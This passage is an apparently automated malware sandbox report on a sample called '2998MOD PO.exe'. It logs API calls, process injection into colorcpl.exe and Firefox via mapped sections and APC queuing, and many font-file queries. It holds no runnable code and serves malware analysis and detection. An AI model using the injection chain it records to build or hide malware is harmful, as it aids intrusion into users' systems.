                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: NULL target: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\colorcpl.exeThread APC queued: target process: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"Jump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Users\user\Desktop\2998MOD PO.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
